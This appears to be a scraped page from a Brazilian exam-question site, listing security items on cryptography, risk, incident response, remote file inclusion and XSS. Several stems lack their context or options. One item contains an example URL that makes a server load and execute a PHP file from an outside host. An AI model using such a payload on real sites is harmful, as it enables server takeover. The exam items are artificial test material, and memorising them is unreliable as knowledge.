Questões de Concurso
Foram encontradas 10.458 questões
Resolva questões gratuitamente!
Junte-se a mais de 4 milhões de concurseiros!
Sobre as práticas de gerenciamento de arquivos e backup nesse cenário, assinale a alternativa CORRETA.
I. A chave pública é usada para criptografar a mensagem, e a chave privada é utilizada para decriptá-la, garantindo que apenas o destinatário pretendido consiga ler os dados.
II. RSA e ECC são abordagens amplamente utilizadas em criptografia de chave pública devido à sua capacidade de fornecer segurança com diferentes tamanhos de chave.
III. A criptografia de chave pública é mais eficiente em termos de processamento do que a criptografia simétrica, especialmente para grandes volumes de dados.
Quais estão corretas?
I. A análise de riscos envolve a identificação e avaliação dos riscos que podem impactar a segurança da informação.
II. O tratamento de risco pode incluir medidas para mitigar, transferir, aceitar ou evitar o risco.
III. O risco residual é o risco que permanece após a implementação de medidas de tratamento de risco.
Quais estão corretas?
I. Um incidente de segurança é qualquer evento que ameaça a confidencialidade, integridade ou disponibilidade da informação.
II. Incidentes de segurança podem ser causados por ações deliberadas ou acidentais.
III. Todos os incidentes de segurança resultam em perda de dados.
Quais estão corretas?
I. Exclusão imediata dos registros de incidentes após a solução do problema para evitar sobrecarga de sistemas.
II. Manutenção de equipes de resposta apenas durante o horário comercial, exceto em casos de ataques críticos.
III. Registro detalhado de incidentes para análise posterior, comunicação com partes interessadas e melhoria contínua dos procedimentos.
IV. Implementação de medidas punitivas automáticas contra possíveis agressores sem investigação formal.
Está(ão) correta(s) a(s) afirmativa(s):
São atribuições típica dessas equipes:
I. Armazenar informações pessoais de cidadãos sem consentimento.
II. Prevenir e detectar incidentes de segurança em redes computacionais.
III. Coordenar ações de resposta a incidentes de segurança.
IV. Comunicar incidentes ao Gabinete de Segurança Institucional da Presidência da República.
Está(ão) incorreta(s) a(s) afirmativa(s):
Durante a verificação de vulnerabilidades contratada por essa empresa, foi observado que o servidor da página web da Empresa1234 processava o valor fornecido no parâmetro file sem realizar validação ou sanitização adequada.
Como resultado, foi possível incluir e executar no servidor o conteúdo de um arquivo malicioso hospedado no endereço http://testevulnerabilidade.com/badpage.php
O teste foi realizado utilizando o seguinte endereço:
http://empresa1234.com/vaga.php?file=http://testevulnerabilida de.com/badpage.php
Ao acessar essa URL, o conteúdo do arquivo badpage.php foi carregado e executado diretamente pelo servidor da Empresa1234, comprometendo sua segurança.
O tipo de vulnerabilidade presente no servidor de página da Empresa1234 é o
Com base no funcionamento da criptografia assimétrica, sobre o processo de envio de uma mensagem criptografada é correto afirmar que
Esse código era executado automaticamente no navegador de qualquer funcionário que visualizasse os relatórios, redirecionando-os para sites fraudulentos.
Nesse contexto, o ataque foi identificado como
No contexto de segurança de banco de dados, avalie as afirmativas a seguir.
I. O protocolo HTTPS, bem como outros similares, tem se tornado default para APIs na nuvem modernas.
II. Criptografia de disco completo em laptops são essenciais para proteger dados em caso de roubo do dispositivo.
III. Todas as formas de dados armazenados, incluindo dados em servidores, sistemas de arquivos, bancos de dados e armazenamento em nuvem, devem ser criptografadas para proteger contra acessos não autorizados.
Acerca do estado dos dados nas três afirmativas, é correto afirmar que
Sobre o processo de recuperação nesse caso, assinale a afirmativa correta.